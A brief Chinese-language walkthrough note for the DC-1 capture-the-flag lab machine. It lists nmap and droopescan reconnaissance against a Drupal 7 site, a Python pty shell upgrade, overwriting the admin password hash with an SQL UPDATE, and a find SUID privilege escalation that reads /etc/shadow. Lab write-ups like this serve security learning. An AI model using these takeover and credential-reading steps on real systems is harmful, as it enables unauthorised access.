靶机DC-1的通关笔记
nmap -A -sC -sS -n -Pn -vvv -oN DC-1 192.168.1.156
droopescan scan drupal -u 192.168.1.156
python -c 'import pty;pty.spawn("/bin/bash")' #优化终端
https://www.drupal.org/node/1023428
./scripts/password-hash.sh 12345
UPDATE users SET pass='$S$DZyKe31ZRwS4msLQYHacPaiIpOZIwHsblIeObnCuz4o3OeGDMblJ' where uid=1;
find flag1.txt -exec cat /etc/shadow \;
最后总结:
1.droopescan扫描工具的使用
2.优化终端 python -c 'import pty;pty.spawn("/bin/bash")'
3.drupal 7 默认数据库配置文件/sites/default/settings.php 以及修改密码的方法 https://www.drupal.org/node/1023428
4.find的suid提权方法
5.还有一个疑问drupal的版本到底是多少呢?在reports下的status report找到 了版本号7.24
6.我真菜